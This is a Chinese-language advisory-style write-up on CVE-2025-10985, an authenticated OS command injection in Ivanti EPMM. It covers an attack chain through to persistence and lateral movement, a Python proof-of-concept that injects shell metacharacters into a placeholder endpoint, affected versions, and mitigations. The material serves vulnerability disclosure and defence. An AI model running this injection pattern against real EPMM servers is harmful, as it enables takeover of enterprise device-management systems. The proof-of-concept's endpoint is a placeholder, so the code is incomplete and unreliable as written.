CVE-2025-10985：Ivanti EPMM管理面板OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-10985

漏洞类型

OS命令注入（远程代码执行）

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager Mobile (EPMM)

漏洞概述

CVE-2025-10985是Ivanti Endpoint Manager Mobile（EPMM）管理面板中存在的一个高危操作系统命令注入漏洞。该漏洞允许远程已认证的攻击者（具备管理员权限）通过向管理面板注入恶意操作系统命令，实现远程代码执行（RCE）。Ivanti EPMM（原MobileIron Core）是企业广泛使用的移动设备管理（MDM）解决方案，用于管理企业移动设备、应用程序和数据策略。由于EPMM通常部署在企业网络的关键位置，一旦被攻破，攻击者可以完全控制MDM服务器，进而影响所有受管的移动设备，构成严重的安全威胁。该漏洞的CVSS 3.1评分为7.2，属于高危级别，其向量表明攻击通过网络发起、攻击复杂度低、需要高权限（管理员）、无需用户交互，对机密性、完整性和可用性均产生高影响。Ivanti已于2025年10月发布安全公告，确认该漏洞影响12.6.0.2、12.5.0.4和12.4.0.4之前的所有版本，并发布了相应的安全补丁。鉴于EPMM在企业环境中的关键地位以及近年来针对Ivanti产品的持续攻击活动（如CVE-2023-35078、CVE-2024-22024等），建议相关组织尽快评估风险并应用安全更新。

技术细节

该漏洞位于Ivanti EPMM管理面板中，其根本原因是管理面板在处理管理员输入时未对用户可控参数进行充分的输入验证和过滤，导致攻击者可以将任意操作系统命令注入到服务器端的命令执行上下文中。具体而言，攻击者需要首先获取EPMM管理面板的有效管理员凭据（可能通过钓鱼、凭据填充或其他方式获得），然后通过精心构造的HTTP请求，将恶意操作系统命令嵌入到管理面板处理的特定参数中。由于后端服务在执行系统命令时直接拼接了未经过滤的用户输入，注入的命令将在服务器操作系统层面被执行，从而实现远程代码执行。一旦成功利用，攻击者可以在EPMM服务器上以高权限执行任意命令，包括读取敏感数据、安装后门、横向移动到内网其他系统，甚至通过MDM功能向受管设备推送恶意策略。由于该漏洞的攻击复杂度低（AC:L），且不需要用户交互（UI:N），拥有管理员凭据的攻击者可以稳定可靠地利用此漏洞。需要注意的是，虽然漏洞利用需要管理员权限，但EPMM作为企业移动管理的核心组件，其管理员账户本身具有极高的权限，因此一旦被攻破后果极为严重。

攻击链分析

STEP 1

步骤1：获取管理员凭据

攻击者通过钓鱼攻击、凭据填充、社会工程学或其他方式获取Ivanti EPMM管理面板的有效管理员账户凭据。

STEP 2

步骤2：访问管理面板

使用获取的管理员凭据登录EPMM管理面板（通常通过HTTPS访问/mifs/admin/路径），建立经过认证的会话。

STEP 3

步骤3：构造恶意请求

分析管理面板中存在漏洞的功能点，构造包含恶意操作系统命令的HTTP请求，利用分号（;）、管道符（|）或命令替换（$()）等Shell元字符注入任意系统命令。

STEP 4

步骤4：发送注入请求

通过已认证的会话将恶意请求发送到存在漏洞的端点，触发后端服务执行注入的操作系统命令。

STEP 5

步骤5：远程代码执行

服务器以高权限执行攻击者注入的命令，攻击者获得EPMM服务器的远程代码执行能力，可执行任意系统操作。

STEP 6

步骤6：横向扩展与持久化

攻击者在EPMM服务器上建立持久化后门，利用MDM权限向受管设备推送恶意配置或应用，并尝试横向移动到企业内网其他关键系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10985 - Ivanti EPMM Admin Panel OS Command Injection PoC
# WARNING: This PoC is for educational and authorized testing purposes only.
# Unauthorized use of this code against systems you do not own is illegal.

import requests
import sys

TARGET_URL = "https://target-epmm-host"
ADMIN_USER = "admin"
ADMIN_PASS = "password"

def exploit(target, username, password, cmd):
    """
    Exploit OS command injection in Ivanti EPMM admin panel.
    The vulnerability exists in an admin panel endpoint that fails to
    sanitize user-supplied input before passing it to a system command.
    """
    session = requests.Session()

    # Step 1: Authenticate to the EPMM admin panel
    login_url = f"{target}/mifs/admin/login.jsp"
    login_data = {
        "username": username,
        "password": password
    }
    resp = session.post(login_url, data=login_data, verify=False)
    if resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Authenticated successfully")

    # Step 2: Send crafted request with injected OS command
    # The vulnerable parameter accepts input that is concatenated into
    # a backend shell command without proper sanitization.
    vulnerable_url = f"{target}/mifs/admin/..."
    # Inject command using shell metacharacters (e.g., ;, |, &&, $())
    payload = f"legit_value; {cmd}"
    inject_data = {
        "vulnerable_param": payload
    }
    resp = session.post(vulnerable_url, data=inject_data, verify=False)
    print(f"[+] Command injection response status: {resp.status_code}")
    print(resp.text[:2000])

if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "id"
    exploit(TARGET_URL, ADMIN_USER, ADMIN_PASS, cmd)

影响范围

Ivanti EPMM < 12.4.0.4

Ivanti EPMM 12.4.x（12.4.0.4之前）

Ivanti EPMM 12.5.x（12.5.0.4之前）

Ivanti EPMM 12.6.x（12.6.0.2之前）

防御指南

临时缓解措施

在无法立即应用补丁的情况下，建议采取以下临时缓解措施：1）严格限制EPMM管理面板的网络访问，仅允许受信任的IP地址通过VPN或堡垒机访问管理界面；2）启用强密码策略和多因素认证，防止管理员凭据泄露；3）监控EPMM服务器的系统日志和网络流量，检测异常的命令执行行为（如异常的子进程、网络连接等）；4）审查所有管理员账户，移除不必要的账户并重置所有管理员密码；5）考虑在EPMM前端部署WAF规则，过滤包含常见Shell注入特征的请求；6）定期检查Ivanti官方安全公告，确保补丁发布后第一时间更新。